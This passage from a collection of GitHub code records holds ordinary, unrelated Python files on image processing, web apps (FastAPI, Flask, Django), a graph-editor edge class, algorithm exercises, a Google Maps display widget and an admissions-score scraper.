equalize_hist_img(cvimg):\n return cv2.equalizeHist(convert2grey(cvimg))\n\ndef linear_stretch_hist_img_and_img(cvimg):\n\n g_img = convert2grey(cvimg)\n width = 256\n grey_histo = cv2.calcHist([g_img], [0], None, [width], [0, 256])\n\n histmin = 0\n for i in range(0,255):\n if grey_histo[i] != 0:\n histmin = i\n break\n\n histmax = 255\n for i in range(255,0,-1):\n if grey_histo[i] != 0:\n histmax = i\n break\n\n tmp_grey = (g_img - histmin) * 255.0 / (histmax - histmin)\n cust_grey = np.uint8(np.around(tmp_grey))\n\n bins = np.arange(width).reshape(width,1)\n color = [(255,0,0)]\n h = np.zeros((cust_grey.shape[0], width, 1), dtype=cust_grey.dtype)\n for ch, col in enumerate(color):\n hist_item = cv2.calcHist([cust_grey], [ch], None, [width], [0, 256])\n cv2.normalize(hist_item, hist_item, 0, 255, cv2.NORM_MINMAX)\n hist = np.int32(np.around(hist_item))\n pts = np.column_stack((bins, hist))\n cv2.polylines(h, [pts], False, col)\n\n custom_h_image=np.flipud(h)\n\n return custom_h_image, cust_grey\n\ndef convolve(grey_img,kernel):\n\n (iH, iW) = grey_img.shape[:2]\n (kH, kW) = kernel.shape[:2]\n pad = (kW - 1) // 2\n\n # below can be used if we want to keep padded image\n # image = cv2.copyMakeBorder(cv_img, pad, pad, pad, pad,cv2.BORDER_REPLICATE)\n\n output = np.zeros((iH, iW), dtype='float32')\n\n # inverting colors by scanning through pixels\n for x in xrange(pad, iH - pad):\n for y in xrange(pad, iW - pad):\n roi = grey_img[x - pad:x + pad + 1, y - pad:y + pad + 1]\n k = (roi * kernel).sum()\n output[x, y] = k\n\n #maxout = output.max()\n #minout = output.min()\n #output = (output - minout) * 255.0 / (maxout - minout)\n output = np.uint8(np.around(output))\n\n return output","repo_name":"Zolcseg/medinfo","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6549782119","text":"import cv2\r\nimport numpy as np\r\nimport os \r\nfrom sklearn.decomposition import PCA\r\nfrom feature_extract import My_Hog\r\nimport pandas as pd\r\n\r\nfile = 'E:/openpose/crawler/crop_face/'\r\nsources = ['vcg_CN_1_crop/','veer_CN_1_crop/']\r\nages = ['baby/','child/','early_youth/','youth/','middle_age/','older/']\r\ngenders = ['male/','female/','gender/']\r\ngender_feature=[]\r\nage_feature=[]\r\nfor source in sources:\r\n for age_index,age in enumerate(ages):\r\n for gender_index,gender in enumerate(genders):\r\n filedir=file+source+age+gender\r\n if os.path.exists(filedir):\r\n filepathes = os.listdir(filedir)\r\n\r\n for impath in filepathes:\r\n im=cv2.imread(filedir+impath)\r\n # img_gray = cv2.cvtColor(im, cv2.IMREAD_GRAYSCALE)\r\n Hog_feature = My_Hog(im)\r\n age_feature.append([np.transpose(Hog_feature)[0][:],age_index])\r\n if (age_index >1):\r\n gender_feature.append([np.transpose(Hog_feature)[0][:],gender_index])\r\n pd.DataFrame(age_feature).to_csv('HOG_age.txt',header=None,index=None)\r\n pd.DataFrame(gender_feature).to_csv('HOG_gender.txt',header=None,index=None)\r\n#pca = PCA(n_components=2)\r\n#Hog_feature=pca.fit_transform(feature) \r\n# sift = cv2.xfeatures2d.SIFT_create()\r\n# keypoints, descriptor = sift.detectAndCompute(img_gray, None)\r\n# img = cv2.drawKeypoints(image=im, outImage=im, keypoints=keypoints,\r\n# flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS,\r\n# color=(51, 163, 236))\r\n# \r\n# \r\n# winSize = (64,64)\r\n# blockSize = (16,16)\r\n# blockStride = (8,8)\r\n# cellSize = (8,8)\r\n# nbins = 9\r\n# derivAperture = 1\r\n# winSigma = 4.\r\n# histogramNormType = 0\r\n# L2HysThreshold = 2.0000000000000001e-01\r\n# gammaCorrection = 0\r\n# nlevels = 64\r\n# hog = cv2.HOGDescriptor(winSize,blockSize,blockStride,cellSize,nbins,derivAperture,winSigma,\r\n# histogramNormType,L2HysThreshold,gammaCorrection,nlevels)\r\n# #compute(img[, winStride[, padding[, locations]]]) -> descriptors\r\n# winStride = (8,8)\r\n# padding = (8,8)\r\n# locations = ((10,20),)\r\n# hist = hog.compute(im,winStride,padding,locations)\r\n# print(hist.shape)","repo_name":"xinjialimath/Fudan-course-projects","sub_path":"CVproject_1906/traditional_way_HOG/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74789538962","text":"import lexer\n\nclass Position:\n def __init__(self, idx, line, col) -> None:\n self.idx = idx\n self.line = line\n self.col = col\n\n def advance(self, current):\n self.col += 1\n self.idx += 1\n\n if isinstance(current, str):\n if current == '\\n':\n self.line += 1\n self.col = 0\n elif isinstance(current, lexer.Token):\n if current.type == lexer.T_NL:\n self.line += 1\n self.col = 0\n \n def clone(self):\n return Position(self.idx, self.line, self.col)","repo_name":"dxuglas/L1ProjectLang","sub_path":"src/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33704619349","text":"import json\n\nimport fastapi\nimport sqlalchemy.exc\n\nimport src.api.redirect_route as redirect_route\nimport src.api.url_router as url_route\nimport src.config\nimport src.db.session\nimport src.logger\n\napp: fastapi.FastAPI = fastapi.FastAPI(\n title=\"URL shortener\", description=\"A simple API for creating short urls\"\n)\napp.include_router(redirect_route.router)\napp.include_router(url_route.router)\nlogger = src.logger.get_logger(__name__)\n\n\n@app.on_event(\"startup\")\nasync def startup() -> None:\n config = src.config.Config()\n src.db.session.configure_session(config.db_url)\n logger.info(json.dumps(\"Application started\"))\n\n\n@app.exception_handler(sqlalchemy.exc.SQLAlchemyError)\ndef handle_sqlalchemy_general_error(\n request: fastapi.Request, exc: sqlalchemy.exc.SQLAlchemyError\n) -> fastapi.responses.JSONResponse:\n return fastapi.responses.JSONResponse(\n status_code=fastapi.status.HTTP_400_BAD_REQUEST,\n content={\"message\": \"Sqlalchemy error\", \"detail\": exc._message()},\n )\n","repo_name":"Nathicanaa/url-shortener","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75061378321","text":"from __future__ import annotations\n\nfrom typing import Optional, OrderedDict\n\nfrom PyQt5.QtCore import QPointF, Qt\nfrom PyQt5.QtGui import QColor, QPainter, QPainterPath, QPen\nfrom PyQt5.QtWidgets import (\n QGraphicsPathItem,\n QStyleOptionGraphicsItem,\n QWidget,\n)\n\nfrom pyflow.core.serializable import Serializable\nfrom pyflow.core.socket import Socket\nfrom pyflow.core.executable import Executable, ExecutableState\n\n\nclass Edge(QGraphicsPathItem, Serializable, Executable):\n\n \"\"\"Base class for directed edges in Pyflow.\"\"\"\n\n DEFAULT_DATA = {\"path_type\": \"bezier\"}\n MANDATORY_FIELDS = {\"source\", \"destination\"}\n\n def __init__(\n self,\n edge_width: float = 5.0,\n path_type=DEFAULT_DATA[\"path_type\"],\n edge_color=\"#001000\",\n edge_selected_color=\"#FFA637\",\n edge_running_color=\"#FF0000\",\n edge_pending_color=\"#00ff00\",\n source: QPointF = QPointF(0, 0),\n destination: QPointF = QPointF(0, 0),\n source_socket: Socket = None,\n destination_socket: Socket = None,\n ):\n \"\"\"Base class for edges in Pyflow.\n\n Args:\n edge_width: Width of the edge.\n path_type: Type of path, one of ('direct', 'bezier').\n edge_color: Color of the edge.\n edge_selected_color: Color of the edge when it is selected.\n source: Source point of the directed edge.\n destination: Destination point of the directed edge.\n source_socket: Source socket of the directed edge, overrides source.\n destination_socket: Destination socket of the directed edge, overrides destination.\n\n \"\"\"\n\n Serializable.__init__(self)\n QGraphicsPathItem.__init__(self, parent=None)\n Executable.__init__(self)\n\n self._pen = QPen(QColor(edge_color))\n self._pen.setWidthF(edge_width)\n\n self._pen_dragging = QPen(QColor(edge_color))\n self._pen_dragging.setWidthF(edge_width)\n self._pen_dragging.setStyle(Qt.PenStyle.DashLine)\n\n self._pen_selected = QPen(QColor(edge_selected_color))\n self._pen_selected.setWidthF(edge_width)\n\n self._pen_running = QPen(QColor(edge_running_color))\n self._pen_running.setWidthF(edge_width)\n\n self._pen_pending = QPen(QColor(edge_pending_color))\n self._pen_pending.setWidthF(edge_width)\n\n self.state_pens = {\n ExecutableState.IDLE: self._pen,\n ExecutableState.RUNNING: self._pen_running,\n ExecutableState.PENDING: self._pen_pending,\n }\n\n self.setFlag(QGraphicsPathItem.GraphicsItemFlag.ItemIsSelectable)\n self.setZValue(-1)\n\n self.path_type = path_type\n\n self.source_socket = source_socket\n self.destination_socket = destination_socket\n\n self._source = source\n self._destination = destination\n self.update_path()\n\n def remove_from_socket(self, socket_type=\"source\"):\n \"\"\"Remove the edge from the sockets it is snaped to on the given socket_type.\n\n Args:\n socket_type: One of ('source', 'destination').\n\n \"\"\"\n socket_name = f\"{socket_type}_socket\"\n socket = getattr(self, socket_name, Socket)\n if socket is not None:\n socket.remove_edge(self)\n setattr(self, socket_name, None)\n\n def remove_from_sockets(self):\n \"\"\"Remove the edge from all sockets it is snaped to.\"\"\"\n self.remove_from_socket(\"source\")\n self.remove_from_socket(\"destination\")\n\n def remove(self):\n \"\"\"Remove the edge from the scene in which it is drawn.\"\"\"\n scene = self.scene()\n if scene is not None:\n self.remove_from_sockets()\n scene.removeItem(self)\n\n def paint(\n self,\n painter: QPainter,\n option: QStyleOptionGraphicsItem, # pylint:disable=unused-argument\n widget: Optional[QWidget] = None, # pylint:disable=unused-argument\n ):\n \"\"\"Paint the edge.\"\"\"\n self.update_path()\n if self.isSelected():\n pen = self._pen_selected\n elif self.destination_socket is None:\n pen = self._pen_dragging\n else:\n pen = self.state_pens[self.run_state]\n painter.setPen(pen)\n painter.setBrush(Qt.BrushStyle.NoBrush)\n painter.drawPath(self.path())\n\n def update_path(self):\n \"\"\"Update the edge path depending on the path_type.\"\"\"\n path = QPainterPath(self.source)\n if self.path_type == \"direct\":\n path.lineTo(self.destination)\n elif self.path_type == \"bezier\":\n sx, sy = self.source.x(), self.source.y()\n dx, dy = self.destination.x(), self.destination.y()\n mid_dist = (dy - sy) / 2\n path.cubicTo(sx, sy + mid_dist, dx, dy - mid_dist, dx, dy)\n else:\n raise NotImplementedError(f\"Unknowed path type: {self.path_type}\")\n self.setPath(path)\n\n @property\n def source(self) -> QPointF:\n \"\"\"Source point of the directed edge.\"\"\"\n if self.source_socket is not None:\n return self.source_socket.scenePos()\n return self._source\n\n @source.setter\n def source(self, value: QPointF):\n self._source = value\n try:\n self.update_path()\n except AttributeError:\n pass\n\n @property\n def source_socket(self) -> Socket:\n \"\"\"Source socket of the directed edge.\"\"\"\n return self._source_socket\n\n @source_socket.setter\n def source_socket(self, value: Socket):\n self._source_socket = value\n if value is not None:\n self.source_socket.add_edge(self, is_destination=False)\n self.source = value.scenePos()\n\n @property\n def destination(self) -> QPointF:\n \"\"\"Destination point of the directed edge.\"\"\"\n if self.destination_socket is not None:\n return self.destination_socket.scenePos()\n return self._destination\n\n @destination.setter\n def destination(self, value: QPointF):\n self._destination = value\n try:\n self.update_path()\n except AttributeError:\n pass\n\n @property\n def destination_socket(self) -> Socket:\n \"\"\"Destination socket of the directed edge.\"\"\"\n return self._destination_socket\n\n @destination_socket.setter\n def destination_socket(self, value: Socket):\n self._destination_socket = value\n if value is not None:\n self.destination_socket.add_edge(self, is_destination=True)\n self.destination = value.scenePos()\n\n def serialize(self) -> OrderedDict:\n return OrderedDict(\n [\n (\"id\", self.id),\n (\"path_type\", self.path_type),\n (\n \"source\",\n OrderedDict(\n [\n (\n \"block\",\n self.source_socket.block.id\n if self.source_socket\n else None,\n ),\n (\n \"socket\",\n self.source_socket.id if self.source_socket else None,\n ),\n ]\n ),\n ),\n (\n \"destination\",\n OrderedDict(\n [\n (\n \"block\",\n self.destination_socket.block.id\n if self.destination_socket\n else None,\n ),\n (\n \"socket\",\n self.destination_socket.id\n if self.destination_socket\n else None,\n ),\n ]\n ),\n ),\n ]\n )\n\n def deserialize(self, data: OrderedDict, hashmap: dict = None, restore_id=True):\n if restore_id and \"id\" in data:\n self.id = data[\"id\"]\n\n self.complete_with_default(data)\n\n self.path_type = data[\"path_type\"]\n try:\n self.source_socket = hashmap[data[\"source\"][\"socket\"]]\n\n self.destination_socket = hashmap[data[\"destination\"][\"socket\"]]\n self.update_path()\n except KeyError:\n self.remove()\n","repo_name":"Bycelium/PyFlow","sub_path":"pyflow/core/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","stars":1220,"dataset":"github-code","pt":"3"} +{"seq_id":"11804901553","text":"import numpy as np\nimport time\nfrom . import console\n\n# This is currently for use in a 1D model...\nclass Mesh:\n\n def __init__(self, spatial_res, z, verbose=True):\n self.verbose = verbose\n self.spatial_res = spatial_res\n if '.' in str(self.spatial_res):\n self.spatial_sigfigs = len(str(self.spatial_res)) - 1\n else:\n self.spatial_sigfigs = len(str(self.spatial_res))\n self.z = z\n self.z_coords = None\n self.dimensions = 1\n\n\n def build_linear(self, df=None):\n console.event(\"Generating model nodes...\", verbose=self.verbose)\n t_start = time.time()\n nodes = []\n z_coords = np.arange(0.0, self.z + self.spatial_res, self.spatial_res)\n console.event(\"Detected a 1D model. Generating {} nodes...\".format(len(z_coords)), verbose=self.verbose)\n for k in z_coords:\n nodes.append(round(k, self.spatial_sigfigs))\n if df is not None:\n df['coords'] = nodes\n console.event(\"Finished generating model nodes! (task took {}s)\".format(\n time.time() - t_start), verbose=self.verbose)\n return nodes\n\n def get_spatial_sigfigs(self):\n return self.spatial_sigfigs\n\n\n","repo_name":"ScottHull/Chimera","sub_path":"Chimera/Chimera_1D/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70697614163","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import jsonify\nfrom flask import request\nimport psycopg2\nimport highlight\napp = Flask(__name__)\n\n\n@app.route(\"/highlight\")\ndef highlight_route():\n paper_idx = request.args.get('paper', type = str)\n term1 = request.args.get('term1', default = None, type = str)\n term2 = request.args.get('term2', default = None, type = str)\n terms = request.args.get('terms', default = [], type = list)\n if(term1!=None and term2!=None):\n terms = [term1,term2]\n\n dic = highlight.highlight_v2(paper_idx,terms)\n if(type(dic)==str):\n if(dic=='unk'):\n return \"

This paper has an unknown license situation and therefore we cannot show full text of it.

\"\n title=dic['title'] \n absts=dic['abstract']\n bodys=dic['body']\n for abst in absts:\n if(abst['highlight']):\n x = abst['highlight_zone']\n x.sort()\n l = []\n idx = 0\n for (start,end) in x:\n #Go through every \n l.append((abst['text'][idx:start],False))\n l.append((abst['text'][start:end],True))\n idx = end\n\n l.append((abst['text'][idx:],False))\n abst['text']= l \n #for abst in bodys:\n if(bodys==\"unk\"):\n bodys = {'text':'This paper has no documented license provided by CORD-19 metadata, and therefore we cannot show the body. Please seek it out from https://www.kaggle.com/allen-institute-for-ai/CORD-19-research-challenge for more information.',\"highlight\":False}\n \n for i in range(len(bodys)):\n paragraph=bodys[i]\n if(paragraph['highlight']):\n x = paragraph['highlight_zone']\n x.sort()\n l = []\n idx = 0\n for (start,end) in x:\n l.append((paragraph['text'][idx:start],False))\n l.append((paragraph['text'][start:end],True))\n idx = end\n\n l.append((paragraph['text'][idx:],False))\n #abst['text']= l \n paragraph['text'] = l\n bodys[i] = paragraph\n print(paragraph)\n\n\n\n return render_template('highlight.html', title=dic['title'], absts=dic['abstract'],bodys=dic['body'],journal=dic['journal'], doi=dic['doi'])\n\n","repo_name":"DnlRKorn/CoKE","sub_path":"webportal/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8969079273","text":"#! /usr/bin/env python3.7\n\nfrom typing import List, Optional, Tuple\n\nimport sys\nimport collections\nimport itertools\nimport random\nfrom queue import Queue\n\n\nclass Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n dx = [1 , 0, -1, 0]\n dy = [0, 1, 0, -1]\n\n seen = set()\n\n for i, row in enumerate(board):\n for j, cell in enumerate(row):\n if cell == \"O\" and (i, j) not in seen:\n seen.add((i, j))\n q = Queue()\n q.put((i, j))\n\n group = [(i,j)]\n\n max_i, min_i = 0, float(\"inf\")\n max_j, min_j = 0, float(\"inf\")\n\n while not q.empty():\n x, y = q.get()\n max_i = max(max_i, x)\n min_i = min(min_i, x)\n max_j = max(max_j, y)\n min_j = min(min_j, y)\n \n for xp, yp in zip(dx, dy):\n xx = max(0, min(x + xp, len(board) - 1))\n yy = max(0, min(y + yp, len(row) - 1))\n if board[xx][yy] == \"O\" and (xx, yy) not in seen:\n seen.add((xx, yy))\n group.append((xx, yy))\n q.put((xx, yy))\n\n if min_i > 0 and max_i < len(board) - 1 and min_j > 0 and max_j < len(row) - 1:\n for x, y in group:\n board[x][y] = \"X\"\n\n def solveFaster(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n dx = [1 , 0, -1, 0]\n dy = [0, 1, 0, -1]\n\n if not board or not board[0]:\n return\n\n rows = len(board)\n cols = len(board[0])\n\n from itertools import product\n borders = list(product(range(0, rows), [0, cols - 1])) + \\\n list(product([0, rows - 1], range(0, cols)))\n\n for i,j in borders:\n if board[i][j] == 'O':\n q = Queue()\n q.put((i, j))\n\n while not q.empty():\n x, y = q.get()\n board[x][y] = 'E'\n\n if board[x][y] != 'O':\n continue\n\n board[x][y] = 'E'\n\n for xp, yp in zip(dx, dy):\n xx = max(0, min(x + xp, rows - 1))\n yy = max(0, min(y + yp, cols - 1))\n q.put((xx, yy))\n\n for i in range(rows):\n for j in range(cols):\n if board[i][j] != 'X':\n board[i][j] = 'O' if board[i][j] == 'E' else 'X'\n\n\ndef main():\n T = int(input())\n for t in range(T):\n N, M = tuple(map(int ,input().split()))\n\n board = [[c for c in str(input())] for _ in range(N)]\n Solution().solveFaster(board)\n\n for row in board:\n for cell in row:\n print(cell, end=\"\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MathuxNY-73/leetcode","sub_path":"Graph/surroundedRegions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37838807719","text":"from django.shortcuts import render\nfrom .forms import Wow\n# Create your views here.\n\ndef firstfunc(request):\n \n message = 'Hello fron frist application'\n \n form = Wow()\n \n if request.method == 'POST':\n form = Wow(request.POST)\n \n if form.is_valid():\n \n cd = form.cleaned_data\n message = cd['x']\n \n return render(request, 'myFirstApplication/firstpage.html',\n {'form':form,'message': message})","repo_name":"nasserml/Django-Dr-Kareem","sub_path":"12-TheProjectKingWithForm/myFirstApplication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30869041771","text":"## Framed Reflection\r\n## 6 kyu\r\n## https://www.codewars.com/kata/581331293788bc1702001fa6\r\n\r\n\r\ndef mirror(text):\r\n text = text.split()\r\n length = max(len(x) for x in text)\r\n first, last = ['*' * length + '*' * 4] *2\r\n words = first + '\\n' + '\\n'.join([f'* {word[::-1].ljust(length, \" \")} *' for word in text]) + '\\n' + last\r\n return words","repo_name":"stereoabuse/codewars","sub_path":"problems/framed_reflection.py","file_name":"framed_reflection.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73897772242","text":"#!/usr/bin/env python\n#coding=utf-8\n\nfrom flask import Blueprint, render_template, redirect, url_for, \\\n flash, request, current_app, abort\nfrom myway.utils import db, navbar\nfrom myway.common.login import current_user\n\nfrom .models import Article\nfrom .forms import ArticleForm\n\nmoduleid = 'blog'\nblogview = Blueprint(moduleid, __name__, url_prefix='/' + moduleid)\n\n@blogview.route('/')\n@blogview.route('/page/')\ndef index(page=1):\n perpage = current_app.config['BLOG_PERPAGE']\n key = request.args.get('key', '')\n\n base_query = Article.query\n if current_user.is_anonymous():\n base_query = base_query.filter(db.and_(Article.status==3, Article.visibility < 2))\n base_query = base_query.order_by(Article.create_at.desc())\n\n query = base_query\n if key:\n ikey = '%' + key + '%'\n query = query.filter(db.or_(Article.title.ilike(ikey), Article.md_content.ilike(ikey)))\n\n page_obj = query.paginate(page=page, per_page=perpage)\n page_url = lambda page: url_for('blog.index', page=page)\n recents = base_query.offset(0).limit(perpage)\n kwargs = {\n 'key' : key,\n 'page_obj' : page_obj,\n 'page_url' : page_url,\n 'recents' : recents\n }\n return render_template('blog/index.html', **kwargs)\n\n\n@blogview.route('/')\ndef single(id):\n query = Article.query.filter_by(id=id)\n if current_user.is_anonymous():\n query = query.filter(db.and_(Article.status==3,\n Article.visibility<3))\n article = query.first()\n if not article: abort(404)\n return render_template('blog/single.html', article=article)\n\n\n@blogview.route('/new', methods=['GET', 'POST'])\ndef new():\n form = ArticleForm()\n if form.is_submitted and form.validate_on_submit():\n article = Article()\n form.populate_obj(article)\n article.refresh()\n db.session.add(article)\n db.session.commit()\n flash('New article added!', 'success')\n return redirect(url_for('blog.edit', id=article.id))\n\n kwargs = {\n 'form' : form,\n 'action' : url_for('blog.new'),\n 'title' : u'New Article'\n }\n return render_template('blog/new-edit.html', **kwargs)\n\n\n\n@blogview.route('/edit/', methods=['GET', 'POST'])\ndef edit(id):\n form = ArticleForm()\n article = Article.query.get_or_404(id)\n if form.is_submitted and form.validate_on_submit():\n form.populate_obj(article)\n article.refresh()\n db.session.commit()\n flash('Updated!', 'success')\n return redirect(url_for('blog.edit', id=article.id))\n form.process(obj=article)\n\n kwargs = {\n 'form' : form,\n 'action' : url_for('blog.edit', id=id),\n 'view_link' : url_for('blog.single', id=id),\n 'title' : u'Edit: %s' % article.title\n }\n return render_template('blog/new-edit.html', **kwargs)\n\n\n\n\n@blogview.route('/delete/', methods=['GET', 'POST'])\ndef delete(id):\n article = Article.query.get_or_404(id)\n db.session.delete(article)\n db.session.commit()\n flash(u'Article: <%s> Deleted!' % article.title, 'success')\n return redirect('/blog/')\n\n@blogview.context_processor\ndef inject_navid():\n return dict(navid=moduleid)\n\nnavbar.add(moduleid, moduleid.title(), '/%s/' % moduleid)\n","repo_name":"TheWaWaR/myway","sub_path":"myway/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42533809893","text":"import io\nimport math\nimport logging\nimport googlemaps\nfrom babel.dates import format_timedelta\nfrom datetime import datetime, timedelta\nfrom PIL import Image\nfrom epaperengine.widgets.base import BaseWidget\n\nlogger = logging.getLogger(__name__)\n\nHEADER_SIZE = 70\n\n\nclass GooglemapsWidget(BaseWidget):\n fonts = {\n \"route\": (\"OpenSans-Regular-webfont.woff\", 18),\n \"time\": (\"OpenSans-Bold-webfont.woff\", 28),\n }\n\n def __init__(self, settings, size):\n self.key = settings[\"client_key\"]\n self.home = settings[\"home_address\"]\n self.work = settings[\"work_address\"]\n self.units = settings[\"units\"]\n self.locale = settings[\"locale\"]\n self.size = size\n\n # State\n self.client = googlemaps.Client(key=self.key)\n self.map_cache = {}\n self.map = None\n self.directions = None\n\n def _fetch_map(self, directions):\n path = directions[0][\"overview_polyline\"][\"points\"]\n\n if path in self.map_cache:\n return self.map_cache[path]\n\n logger.info(\"Fetching map not in cache\")\n\n width = self.size[0]\n height = self.size[1] - HEADER_SIZE\n\n arguments = {\n \"size\": f\"{width}x{height}\",\n \"path\": (\n \"color:0x000000FF|weight:4|enc:\"\n + directions[0][\"overview_polyline\"][\"points\"]\n ),\n \"style\": \"visibility:simplified\",\n }\n\n response = self.client._request(\n url=\"/maps/api/staticmap\", params=arguments, extract_body=lambda r: r\n )\n response.raise_for_status()\n\n if \"X-Staticmap-API-Warning\" in response.headers:\n logger.warn(response.headers[\"X-Staticmap-API-Warning\"])\n\n # Save to cache and return\n self.map_cache[path] = response.content\n\n return self.map_cache[path]\n\n def update(self):\n now = datetime.now()\n\n # Fetch directions\n directions = self.client.directions(\n self.home, self.work, units=self.units, mode=\"driving\", departure_time=now\n )\n\n # Load map\n map = self._fetch_map(directions)\n\n # Save if everything went right\n self.map = map\n self.directions = directions\n\n def draw(self, helper):\n time = timedelta(\n seconds=self.directions[0][\"legs\"][0][\"duration_in_traffic\"][\"value\"]\n )\n route = self.directions[0][\"summary\"]\n\n # Display the time\n helper.text(\n (20, self.size[1] - HEADER_SIZE + 3),\n format_timedelta(time, locale=self.locale),\n font=self.fonts[\"time\"],\n fill=helper.BLACK,\n )\n\n # Display the route\n helper.text(\n (20, self.size[1] - HEADER_SIZE + 37),\n route,\n font=self.fonts[\"route\"],\n fill=helper.BLACK,\n )\n\n # Display the image\n helper.img.paste(Image.open(io.BytesIO(self.map)).convert(\"RGB\"), (0, 0))\n","repo_name":"ugomeda/esp32-epaper-display","sub_path":"epaper-server/epaperengine/widgets/googlemaps.py","file_name":"googlemaps.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"3"} +{"seq_id":"24537244528","text":"import unittest\n\nimport torch\n\nfrom autocare_dlt.core.utils import AverageMeter\n\n\nclass TestAverageMeter(unittest.TestCase):\n \"\"\"Compute average for torch.Tensor, used for loss average.\"\"\"\n\n def setUp(self):\n self.n_count = 0\n self.sum = 0\n\n def test_build(self):\n avg = AverageMeter()\n self.assertIsInstance(avg, AverageMeter)\n\n def test_update(self):\n avg = AverageMeter()\n size = 1\n if torch.cuda.is_available():\n pseudo_tensor = torch.cuda.FloatTensor(size).fill_(2)\n else:\n pseudo_tensor = torch.FloatTensor(size).fill_(2)\n out = avg.update(pseudo_tensor)\n self.assertEqual(avg.sum, 2)\n self.assertEqual(avg.count, 1)\n\n def test_reset(self):\n avg = AverageMeter()\n avg.reset()\n self.assertEqual(avg.sum, 0)\n self.assertEqual(avg.count, 0)\n\n def test_avgl(self):\n avg = AverageMeter()\n size = 2\n if torch.cuda.is_available():\n pseudo_tensor = torch.cuda.FloatTensor(size).fill_(5)\n else:\n pseudo_tensor = torch.FloatTensor(size).fill_(5)\n avg.update(pseudo_tensor)\n avg.update(pseudo_tensor)\n result = avg.avg\n\n self.assertEqual(result, 5)\n","repo_name":"snuailab/autocare_dlt","sub_path":"tests/core/utils/test_functions.py","file_name":"test_functions.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"31901926527","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib\nfrom urllib.parse import quote, unquote\nimport urllib.request\nimport json\nimport pandas as pd\n\n\ngetListURL=\"http://admin.zhinengdayi.com/front/enroll/getMajorSelectChange?cityName=%E5%8C%97%E4%BA%AC&sCode=NLGYFE\"\nlistRequest=urllib.request.Request(getListURL)\nallList=urllib.request.urlopen(listRequest).read().decode(\"utf-8\")\nlistData=json.loads(allList)\nyearList=listData[\"yearList\"]\nscienceList=listData['scienceList']\ncityList=[\"北京\", \"天津\", '河北','山西','内蒙��',\n '辽宁','吉林','黑龙江','上海','江苏','浙江','安徽',\n '福建','江西','山东', '河南', '湖北','湖南','广西',\n '广东','海南','重庆','四川','贵州','云南','西藏',\n '陕西','甘肃','青海', '宁夏', '新疆']\n\ndef getJSON(city, year, science):\n cityCode=quote(city)\n scienceCode=quote(science)\n response = urllib.request.Request('http://admin.zhinengdayi.com/front/enroll/findMajorScoreCompareList?sCode=NLGYFE&cityName={0}&year={1}&scienceClass={2}&type=%E6%99%AE%E9%80%9A%E6%8B%9B%E7%94%9F&batch='.format(cityCode, year,scienceCode))\n raw = urllib.request.urlopen(response).read().decode(\"utf-8\")\n data=json.loads(raw)\n data=pd.DataFrame(data['list'])\n elementList=[\"majorName\",\"year\",'cityName', \"scienceClass\", \"lowScore\"]\n for i in data.columns:\n if i not in elementList:\n del data[i]\n return data\nif __name__== '__main__':\n scoreData=[]\n scoreData=pd.DataFrame(scoreData)\n for i in cityList:\n for j in yearList:\n for k in scienceList:\n scoreData=scoreData.append(getJSON(i,j,k))\n scoreData.rename(columns={\"majorName\":'专业名','year':'年份','cityName':'省市名',\n 'scienceClass':'科类','lowScore':'录取分数线'})\n print(scoreData)\n scoreData.to_csv(\"对外经贸分数线.csv\",index=None)\n","repo_name":"eshoyuan/GaokaoRecommend","sub_path":"crawler/17-19录取分数爬虫/09118117对外经济贸易大学.py","file_name":"09118117对外经济贸易大学.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"22572185996","text":"def getPermutations(array):\n permutations = []\n # we are going to pass the 'permutations' variable\n # and will update this when we find the new permutation combination\n helper(array, [], permutations)\n return permutations\n\n\ndef helper(array, perm, perms):\n # if nothing in array, append perm to perms \n if len(array) == 0 and len(perm) > 0:\n perms.append(perm)\n # otherwise build combination\n else:\n for idx in range(len(array)):\n # simple way to remove a item in array\n next_array = array[:idx] + array[idx+1:]\n # this is how you add list (append)\n next_perm = perm + [array[idx]]\n # call the helper method with updated variables\n helper(next_array, next_perm, 